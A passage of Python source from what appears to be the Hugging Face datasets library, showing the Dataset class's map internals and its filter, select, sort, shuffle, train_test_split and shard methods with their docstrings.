If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments rank: (`Optional[int]`, defaults to `None`): If specified, this is the process rank when doing multiprocessing offset: (:obj:`int`, defaults to 0): If specified, this is an offset applied to the indices passed to `function` if `with_indices=True`. disable_tqdm (:obj:`bool`, defaults to `False`): Whether to silence tqdm's output. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while mapping examples. cache_only (`bool`, defaults to `False`): Flag in order to notifiy the method will either find a cached dataset or raise `NonExistentDatasetError` exception, """ # Reduce logging to keep things readable in multiprocessing with tqdm if rank is not None and logging.get_verbosity() < logging.WARNING: logging.set_verbosity_warning() # Print at least one thing to fix tqdm in notebooks in multiprocessing # see https://github.com/tqdm/tqdm/issues/485#issuecomment-473338308 if rank is not None and not disable_tqdm and "notebook" in tqdm.__name__: print(" ", end="", flush=True) if fn_kwargs is None: fn_kwargs = {} # If we do batch computation but no batch size is provided, default to the full dataset if batched and (batch_size is None or batch_size <= 0): batch_size = self.num_rows # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if cache_file_name is None: # we create a unique hash from the function, # current dataset file and the mapping args cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached processed dataset at {cache_file_name}") info = self.info.copy() info.features = features info.task_templates = None return Dataset.from_file(cache_file_name, info=info, split=self.split) # Raise an error if we were supposed to return a cached dataset and none was found if cache_only: raise NonExistentDatasetError # We set this variable to True after processing the first example/batch in # `apply_function_on_filtered_inputs` if the map function returns a dict. # If set to False, no new arrow table will be created update_data = None class NumExamplesMismatchError(Exception): pass def validate_function_output(processed_inputs, indices): """Validate output of the map function.""" if processed_inputs is not None and not isinstance(processed_inputs, (Mapping, pa.Table)): raise TypeError( f"Provided `function` which is applied to all elements of table returns a variable of type {type(processed_inputs)}. Make sure provided `function` returns a variable of type `dict` (or a pyarrow table) to update the dataset or `None` if you are only interested in side effects." ) elif isinstance(indices, list) and isinstance(processed_inputs, Mapping): allowed_batch_return_types = (list, np.ndarray) all_dict_values_are_lists = all( isinstance(value, allowed_batch_return_types) for value in processed_inputs.values() ) if all_dict_values_are_lists is False: raise TypeError( f"Provided `function` which is applied to all elements of table returns a `dict` of types {[type(x) for x in processed_inputs.values()]}. When using `batched=True`, make sure provided `function` returns a `dict` of types like `{allowed_batch_return_types}`." 
) def apply_function_on_filtered_inputs(inputs, indices, check_same_num_examples=False, offset=0): """Utility to apply the function on a selection of columns.""" nonlocal update_data fn_args = [inputs] if input_columns is None else [inputs[col] for col in input_columns] if offset == 0: effective_indices = indices else: effective_indices = [i + offset for i in indices] if isinstance(indices, list) else indices + offset additional_args = () if with_indices: additional_args += (effective_indices,) if with_rank: additional_args += (rank,) processed_inputs = function(*fn_args, *additional_args, **fn_kwargs) if update_data is None: # Check if the function returns updated examples update_data = isinstance(processed_inputs, (Mapping, pa.Table)) validate_function_output(processed_inputs, indices) if not update_data: return None # Nothing to update, let's move on if self._format_type is not None: inputs = self._getitem( key=(indices if isinstance(indices, int) else slice(indices[0], indices[-1] + 1)), format_type=None, format_columns=None, format_kwargs=None, decoded=False, ) if remove_columns is not None: for column in remove_columns: inputs.pop(column) if check_same_num_examples: input_num_examples = len(inputs[next(iter(inputs.keys()))]) processed_inputs_num_examples = len(processed_inputs[next(iter(processed_inputs.keys()))]) if input_num_examples != processed_inputs_num_examples: raise NumExamplesMismatchError() if isinstance(inputs, dict) and isinstance(processed_inputs, Mapping): inputs.update(processed_inputs) return inputs else: return processed_inputs def init_buffer_and_writer(): # Prepare output buffer and batched writer in memory or on file if we update the table writer_features = features if writer_features is None: writer_features = self.features update_features = True else: update_features = False if keep_in_memory or cache_file_name is None: buf_writer = pa.BufferOutputStream() tmp_file = None writer = ArrowWriter( features=writer_features, stream=buf_writer, writer_batch_size=writer_batch_size, update_features=update_features, fingerprint=new_fingerprint, disable_nullable=disable_nullable, ) else: buf_writer = None logger.info(f"Caching processed dataset at {cache_file_name}") tmp_file = tempfile.NamedTemporaryFile("wb", dir=os.path.dirname(cache_file_name), delete=False) writer = ArrowWriter( features=writer_features, path=tmp_file.name, writer_batch_size=writer_batch_size, update_features=update_features, fingerprint=new_fingerprint, disable_nullable=disable_nullable, ) return buf_writer, writer, tmp_file # If `update_data` is True after processing the first example/batch, initalize these resources with `init_buffer_and_writer` buf_writer, writer, tmp_file = None, None, None # Optionally initialize the writer as a context manager with contextlib.ExitStack() as stack: try: # Only load the columns we actually need if input_columns: input_dataset = self.with_format( self._format_type, columns=input_columns, output_all_columns=False, **self._format_kwargs ) if remove_columns: remove_columns = list(set(remove_columns) & set(input_columns)) else: input_dataset = self # Loop over single examples or batches and write to buffer/file if examples are to be updated pbar_iterable = input_dataset if not batched else range(0, len(input_dataset), batch_size) pbar_unit = "ex" if not batched else "ba" pbar_desc = (desc or "") + " #" + str(rank) if rank is not None else desc pbar = utils.tqdm( pbar_iterable, disable=disable_tqdm, position=rank, unit=pbar_unit, desc=pbar_desc, ) if not batched: for 
i, example in enumerate(pbar): example = apply_function_on_filtered_inputs(example, i, offset=offset) if update_data: if i == 0: buf_writer, writer, tmp_file = init_buffer_and_writer() stack.enter_context(writer) if isinstance(example, pa.Table): writer.write_row(example) else: writer.write(example) else: for i in pbar: if drop_last_batch and i + batch_size > input_dataset.num_rows: continue batch = input_dataset._getitem( slice(i, i + batch_size), decoded=False, ) indices = list( range(*(slice(i, i + batch_size).indices(input_dataset.num_rows))) ) # Something simpler? try: batch = apply_function_on_filtered_inputs( batch, indices, check_same_num_examples=len(input_dataset.list_indexes()) > 0, offset=offset, ) except NumExamplesMismatchError: raise DatasetTransformationNotAllowedError( "Using `.map` in batched mode on a dataset with attached indexes is allowed only if it doesn't create or remove existing examples. You can first run `.drop_index() to remove your index and then re-add it." ) from None if update_data: if i == 0: buf_writer, writer, tmp_file = init_buffer_and_writer() stack.enter_context(writer) if isinstance(batch, pa.Table): writer.write_table(batch) else: writer.write_batch(batch) if update_data and writer is not None: writer.finalize() # close_stream=bool(buf_writer is None)) # We only close if we are writing in a file except (Exception, KeyboardInterrupt): if update_data: if writer is not None: writer.finalize() if tmp_file is not None: tmp_file.close() if os.path.exists(tmp_file.name): os.remove(tmp_file.name) raise if update_data and tmp_file is not None: tmp_file.close() shutil.move(tmp_file.name, cache_file_name) umask = os.umask(0o666) os.umask(umask) os.chmod(cache_file_name, 0o666 & ~umask) if update_data: # Create new Dataset from buffer or file info = self.info.copy() info.features = writer._features info.task_templates = None if buf_writer is None: return Dataset.from_file(cache_file_name, info=info, split=self.split) else: return Dataset.from_buffer(buf_writer.getvalue(), info=info, split=self.split) else: return self @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["load_from_cache_file", "cache_file_name"], version="2.0.1") def filter( self, function: Optional[Callable] = None, with_indices=False, input_columns: Optional[Union[str, List[str]]] = None, batched: bool = False, batch_size: Optional[int] = 1000, remove_columns: Optional[List[str]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, fn_kwargs: Optional[dict] = None, num_proc: Optional[int] = None, suffix_template: str = "_{rank:05d}_of_{num_proc:05d}", new_fingerprint: Optional[str] = None, desc: Optional[str] = None, ) -> "Dataset": """Apply a filter function to all the elements in the table in batches and update the table so that the dataset only includes examples according to the filter function. Args: function (:obj:`Callable`): Callable with one of the following signatures: - ``function(example: Union[Dict, Any]) -> bool`` if ``with_indices=False, batched=False`` - ``function(example: Union[Dict, Any], indices: int) -> bool`` if ``with_indices=True, batched=False`` - ``function(example: Union[Dict, Any]) -> List[bool]`` if ``with_indices=False, batched=True`` - ``function(example: Union[Dict, Any], indices: int) -> List[bool]`` if ``with_indices=True, batched=True`` If no function is provided, defaults to an always True function: ``lambda x: True``. 
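                For example (illustrative, assuming a ``"label"`` column), ``ds.filter(lambda example: example["label"] == 1)`` keeps only the rows whose label equals ``1``.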
with_indices (:obj:`bool`, default `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`. input_columns (:obj:`str` or `List[str]`, optional): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, defaults to `False`): Provide batch of examples to `function` batch_size (:obj:`int`, optional, default `1000`): Number of examples per batch provided to `function` if ``batched = True``. If ``batched = False``, one example per batch is passed to ``function``. If ``batch_size <= 0`` or ``batch_size == None``: provide the full dataset as a single batch to `function` keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. fn_kwargs (:obj:`dict`, optional): Keyword arguments to be passed to `function` num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. suffix_template (:obj:`str`): If `cache_file_name` is specified, then this suffix will be added at the end of the base name of each. For example, if `cache_file_name` is `"processed.arrow"`, then for ``rank = 1`` and ``num_proc = 4``, the resulting file would be `"processed_00001_of_00004.arrow"` for the default suffix (default `_{rank:05d}_of_{num_proc:05d}`) new_fingerprint (:obj:`str`, optional): The new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while filtering examples. """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.filter` on a dataset with attached indexes is not allowed. 
You can first run `.drop_index() to remove your index and then re-add it.`" ) if function is None: function = lambda x: True # noqa: E731 if remove_columns is not None: raise ValueError("Parameter `remove_columns` passed to .filter() is no longer supported.") indices = self.map( function=partial( get_indices_from_mask_function, function, batched, with_indices, input_columns, self._indices ), with_indices=True, features=Features({"indices": Value("uint64")}), batched=True, batch_size=batch_size, remove_columns=self.column_names, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, fn_kwargs=fn_kwargs, num_proc=num_proc, suffix_template=suffix_template, new_fingerprint=new_fingerprint, input_columns=input_columns, desc=desc, ) new_dataset = copy.deepcopy(self) new_dataset._indices = indices.data new_dataset._fingerprint = new_fingerprint return new_dataset @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["cache_file_name"]) def flatten_indices( self, keep_in_memory: bool = False, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create and cache a new Dataset by flattening the indices mapping. Args: keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, default `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, default `False`): Allow null values in the table. new_fingerprint (`Optional[str]`, default `None`): The new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ return self.map( batched=True, # for speed keep_in_memory=keep_in_memory, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, features=features, disable_nullable=disable_nullable, new_fingerprint=new_fingerprint, desc="Flattening the indices", ) def _new_dataset_with_indices( self, indices_cache_file_name: Optional[str] = None, indices_buffer: Optional[pa.Buffer] = None, fingerprint: Optional[str] = None, ) -> "Dataset": """Return a new Dataset obtained by adding indices (provided in indices_cache_file_name or in a buffer) to the current Dataset. 
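        Used by :func:`select`, :func:`sort`, :func:`shuffle` and :func:`train_test_split` to attach an indices mapping (kept in memory or memory-mapped from a cache file) while sharing the underlying Arrow table instead of copying it.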
""" if indices_cache_file_name is None and indices_buffer is None: raise ValueError("At least one of indices_cache_file_name or indices_buffer must be provided.") if fingerprint is None: raise ValueError("please specify a fingerprint for the dataset with indices") if indices_cache_file_name is not None: indices_table = MemoryMappedTable.from_file(indices_cache_file_name) else: indices_table = InMemoryTable.from_buffer(indices_buffer) # Return new Dataset object # don't forget to copy the objects return Dataset( self._data, info=self.info.copy(), split=self.split, indices_table=indices_table, fingerprint=fingerprint, ) @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["indices_cache_file_name"]) def select( self, indices: Iterable, keep_in_memory: bool = False, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new dataset with rows selected following the list/array of indices. Args: indices (sequence, iterable, ndarray or Series): List or 1D-array of integer indices for indexing. keep_in_memory (:obj:`bool`, default `False`): Keep the indices mapping in memory instead of writing it to a cache file. indices_cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the indices mapping instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if keep_in_memory and indices_cache_file_name is not None: raise ValueError("Please use either `keep_in_memory` or `indices_cache_file_name` but not both.") if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.select` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." 
) # If the array is empty we do nothing if len(self) == 0: return self # Prepare the writer for our indices arrow table if keep_in_memory or indices_cache_file_name is None: buf_writer = pa.BufferOutputStream() tmp_file = None writer = ArrowWriter( stream=buf_writer, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit="indices" ) else: buf_writer = None logger.info(f"Caching indices mapping at {indices_cache_file_name}") tmp_file = tempfile.NamedTemporaryFile("wb", dir=os.path.dirname(indices_cache_file_name), delete=False) writer = ArrowWriter( path=tmp_file.name, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit="indices" ) indices_array = pa.array(indices, type=pa.uint64()) # Check if we need to convert indices if self._indices is not None: indices_array = self._indices.column(0).take(indices_array) indices_table = pa.Table.from_arrays([indices_array], names=["indices"]) with writer: try: writer.write_table(indices_table) writer.finalize() # close_stream=bool(buf_writer is None)) We only close if we are writing in a file except (Exception, KeyboardInterrupt): if tmp_file is not None: tmp_file.close() if os.path.exists(tmp_file.name): os.remove(tmp_file.name) raise if tmp_file is not None: tmp_file.close() shutil.move(tmp_file.name, indices_cache_file_name) umask = os.umask(0o666) os.umask(umask) os.chmod(indices_cache_file_name, 0o666 & ~umask) # Return new Dataset object if buf_writer is None: return self._new_dataset_with_indices( indices_cache_file_name=indices_cache_file_name, fingerprint=new_fingerprint ) else: return self._new_dataset_with_indices(indices_buffer=buf_writer.getvalue(), fingerprint=new_fingerprint) @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["load_from_cache_file", "indices_cache_file_name"]) def sort( self, column: str, reverse: bool = False, kind: str = None, null_placement: str = "last", keep_in_memory: bool = False, load_from_cache_file: bool = True, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new dataset sorted according to a column. Currently sorting according to a column name uses pandas sorting algorithm under the hood. The column should thus be a pandas compatible type (in particular not a nested type). This also means that the column used for sorting is fully loaded in memory (which should be fine in most cases). Args: column (:obj:`str`): column name to sort by. reverse (:obj:`bool`, default `False`): If True, sort by descending order rather then ascending. kind (:obj:`str`, optional): Pandas algorithm for sorting selected in {‘quicksort’, ‘mergesort’, ‘heapsort’, ‘stable’}, The default is ‘quicksort’. Note that both ‘stable’ and ‘mergesort’ use timsort under the covers and, in general, the actual implementation will vary with data type. The ‘mergesort’ option is retained for backwards compatibility. null_placement (:obj:`str`, default `last`): Put `None` values at the beginning if ‘first‘; ‘last‘ puts `None` values at the end. .. versionadded:: 1.14.2 keep_in_memory (:obj:`bool`, default `False`): Keep the sorted indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the sorted indices can be identified, use it instead of recomputing. indices_cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. 
It is used to store the sorted indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. Higher value gives smaller cache files, lower value consume less temporary memory. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.sort` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self # Check the column name if not isinstance(column, str) or column not in self._data.column_names: raise ValueError( f"Column '{column}' not found in the dataset. Please provide a column selected in: {self._data.column_names}" ) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args indices_cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(indices_cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached sorted indices for dataset at {indices_cache_file_name}") return self._new_dataset_with_indices( fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name ) column_data = self._getitem( column, format_type="pandas", format_columns=None, output_all_columns=False, format_kwargs=None ) df_sorted = column_data.to_frame().sort_values( column, ascending=not reverse, kind=kind, na_position=null_placement ) indices = df_sorted.index.to_numpy() return self.select( indices=indices, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=new_fingerprint, ) @transmit_format @fingerprint_transform( inplace=False, randomized_function=True, ignore_kwargs=["load_from_cache_file", "indices_cache_file_name"] ) def shuffle( self, seed: Optional[int] = None, generator: Optional[np.random.Generator] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new Dataset where the rows are shuffled. Currently shuffling uses numpy random generators. You can either supply a NumPy BitGenerator to use, or a seed to initiate NumPy's default random generator (PCG64). Args: seed (:obj:`int`, optional): A seed to initialize the default BitGenerator if ``generator=None``. If None, then fresh, unpredictable entropy will be pulled from the OS. If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state. generator (:obj:`numpy.random.Generator`, optional): Numpy random Generator to use to compute the permutation of the dataset rows. If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy). keep_in_memory (:obj:`bool`, default `False`): Keep the shuffled indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the shuffled indices can be identified, use it instead of recomputing. 
indices_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the shuffled indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. new_fingerprint (:obj:`str`, optional, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.shuffle` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self if seed is not None and generator is not None: raise ValueError("Both `seed` and `generator` were provided. Please specify just one of them.") if generator is not None and not isinstance(generator, np.random.Generator): raise ValueError("The provided generator must be an instance of numpy.random.Generator") if generator is None: if seed is None: seed = np.random.get_state()[1][0] _ = np.random.random() # do 1 step of rng generator = np.random.default_rng(seed) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args indices_cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(indices_cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached shuffled indices for dataset at {indices_cache_file_name}") return self._new_dataset_with_indices( fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name ) permutation = generator.permutation(len(self)) return self.select( indices=permutation, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=new_fingerprint, ) @transmit_format @fingerprint_transform( inplace=False, randomized_function=True, fingerprint_names=["train_new_fingerprint", "test_new_fingerprint"], ignore_kwargs=["load_from_cache_file", "train_indices_cache_file_name", "test_indices_cache_file_name"], ) def train_test_split( self, test_size: Union[float, int, None] = None, train_size: Union[float, int, None] = None, shuffle: bool = True, seed: Optional[int] = None, generator: Optional[np.random.Generator] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, train_indices_cache_file_name: Optional[str] = None, test_indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, train_new_fingerprint: Optional[str] = None, test_new_fingerprint: Optional[str] = None, ) -> "DatasetDict": """Return a dictionary (:obj:`datasets.DatsetDict`) with two random train and test subsets (`train` and `test` ``Dataset`` splits). Splits are created from the dataset according to `test_size`, `train_size` and `shuffle`. This method is similar to scikit-learn `train_test_split` with the omission of the stratified options. 
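        Example (illustrative sketch; assumes an existing :class:`Dataset` ``ds``)::

            splits = ds.train_test_split(test_size=0.1, seed=42)
            train_ds, test_ds = splits["train"], splits["test"]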
Args: test_size (:obj:`numpy.random.Generator`, optional): Size of the test split If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split. If int, represents the absolute number of test samples. If None, the value is set to the complement of the train size. If train_size is also None, it will be set to 0.25. train_size (:obj:`numpy.random.Generator`, optional): Size of the train split If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split. If int, represents the absolute number of train samples. If None, the value is automatically set to the complement of the test size. shuffle (:obj:`bool`, optional, default `True`): Whether or not to shuffle the data before splitting. seed (:obj:`int`, optional): A seed to initialize the default BitGenerator if ``generator=None``. If None, then fresh, unpredictable entropy will be pulled from the OS. If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state. generator (:obj:`numpy.random.Generator`, optional): Numpy random Generator to use to compute the permutation of the dataset rows. If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy). keep_in_memory (:obj:`bool`, default `False`): Keep the splits indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the splits indices can be identified, use it instead of recomputing. train_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the train split indices instead of the automatically generated cache file name. test_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the test split indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. train_new_fingerprint (:obj:`str`, optional, defaults to `None`): the new fingerprint of the train set after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments test_new_fingerprint (:obj:`str`, optional, defaults to `None`): the new fingerprint of the test set after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ from .dataset_dict import DatasetDict # import here because of circular dependency if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.train_test_split` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return DatasetDict({"train": self, "test": self}) if test_size is None and train_size is None: test_size = 0.25 # Safety checks similar to scikit-learn's ones. 
# (adapted from https://github.com/scikit-learn/scikit-learn/blob/fd237278e895b42abe8d8d09105cbb82dc2cbba7/sklearn/model_selection/_split.py#L1750) n_samples = len(self) if ( isinstance(test_size, int) and (test_size >= n_samples or test_size <= 0) or isinstance(test_size, float) and (test_size <= 0 or test_size >= 1) ): raise ValueError( f"test_size={test_size} should be either positive and smaller " f"than the number of samples {n_samples} or a float in the (0, 1) range" ) if ( isinstance(train_size, int) and (train_size >= n_samples or train_size <= 0) or isinstance(train_size, float) and (train_size <= 0 or train_size >= 1) ): raise ValueError( f"train_size={train_size} should be either positive and smaller " f"than the number of samples {n_samples} or a float in the (0, 1) range" ) if train_size is not None and not isinstance(train_size, (int, float)): raise ValueError(f"Invalid value for train_size: {train_size} of type {type(train_size)}") if test_size is not None and not isinstance(test_size, (int, float)): raise ValueError(f"Invalid value for test_size: {test_size} of type {type(test_size)}") if isinstance(train_size, float) and isinstance(test_size, float) and train_size + test_size > 1: raise ValueError( f"The sum of test_size and train_size = {train_size + test_size}, should be in the (0, 1)" " range. Reduce test_size and/or train_size." ) if isinstance(test_size, float): n_test = ceil(test_size * n_samples) elif isinstance(test_size, int): n_test = float(test_size) if isinstance(train_size, float): n_train = floor(train_size * n_samples) elif isinstance(train_size, int): n_train = float(train_size) if train_size is None: n_train = n_samples - n_test elif test_size is None: n_test = n_samples - n_train if n_train + n_test > n_samples: raise ValueError( f"The sum of train_size and test_size = {n_train + n_test}, " "should be smaller than the number of " f"samples {n_samples}. Reduce test_size and/or " "train_size." ) n_train, n_test = int(n_train), int(n_test) if n_train == 0: raise ValueError( f"With n_samples={n_samples}, test_size={test_size} and train_size={train_size}, the " "resulting train set will be empty. Adjust any of the " "aforementioned parameters." 
) if generator is None and shuffle is True: if seed is None: seed = np.random.get_state()[1][0] _ = np.random.random() # do 1 step of rng generator = np.random.default_rng(seed) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if train_indices_cache_file_name is None or test_indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args if train_indices_cache_file_name is None: train_indices_cache_file_name = self._get_cache_file_path(train_new_fingerprint) if test_indices_cache_file_name is None: test_indices_cache_file_name = self._get_cache_file_path(test_new_fingerprint) if ( os.path.exists(train_indices_cache_file_name) and os.path.exists(test_indices_cache_file_name) and load_from_cache_file ): logger.warning( f"Loading cached split indices for dataset at {train_indices_cache_file_name} and {test_indices_cache_file_name}" ) return DatasetDict( { "train": self._new_dataset_with_indices( fingerprint=train_new_fingerprint, indices_cache_file_name=train_indices_cache_file_name ), "test": self._new_dataset_with_indices( fingerprint=test_new_fingerprint, indices_cache_file_name=test_indices_cache_file_name ), } ) if not shuffle: train_indices = np.arange(n_train) test_indices = np.arange(n_train, n_train + n_test) else: # random partition permutation = generator.permutation(len(self)) test_indices = permutation[:n_test] train_indices = permutation[n_test : (n_test + n_train)] train_split = self.select( indices=train_indices, keep_in_memory=keep_in_memory, indices_cache_file_name=train_indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=train_new_fingerprint, ) test_split = self.select( indices=test_indices, keep_in_memory=keep_in_memory, indices_cache_file_name=test_indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=test_new_fingerprint, ) return DatasetDict({"train": train_split, "test": test_split}) def shard( self, num_shards: int, index: int, contiguous: bool = False, keep_in_memory: bool = False, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, ) -> "Dataset": """Return the `index`-nth shard from dataset split into `num_shards` pieces. This shards deterministically. dset.shard(n, i) will contain all elements of dset whose index mod n = i. dset.shard(n, i, contiguous=True) will instead split dset into contiguous chunks, so it can be easily concatenated back together after processing. If n % i == l, then the first l shards will have length (n // i) + 1, and the remaining shards will have length (n // i). `datasets.concatenate([dset.shard(n, i, contiguous=True) for i in range(n)])` will return a dataset with the same order as the original. Be sure to shard before using any randomizing operator (such as shuffle). It is best if the shard operator is used early in the dataset pipeline. Args: num_shards (:obj:`int`): How many shards to split the dataset into. index (:obj:`int`): Which shard to select and return. contiguous: (:obj:`bool`, default `False`): Whether to select contiguous blocks of indices for shards. keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. indices_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. 
It is used to store the indices of each shard instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. """ if not 0 <= index < num_shards: raise ValueError("index should be in [0, num_shards-1]") if contiguous: div = len(self) // num_shards mod = len(self) % num_shards start = div * index + min(index, mod) end = start + div + (1 if index < mod else 0) indices = np.arange(start, end) else: indices = np.arange(index, len(self), num_shards) return self.select( indices=indices, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, ) def export( self, filename: str, format: str = "tfrecord", ): """Writes the Arrow dataset to a TFRecord file. The dataset must already be in tensorflow format. The records will be written with keys from `dataset._format_columns`. Args: filename (:obj:`str`): The filename, including the `.tfrecord` extension, to write to. format (`str`, optional, default `"tfrecord"`): The type of output file. Currently this is a no-op, as TFRecords are the only option. This enables a more flexible function signature later. """ try: import tensorflow as tf # noqa: F401 except ImportError: logger.error("Tensorflow needs to be installed to be able to return Tensorflow tensors.") # From https://www.tensorflow.org/tutorials/load_data/tfrecord def 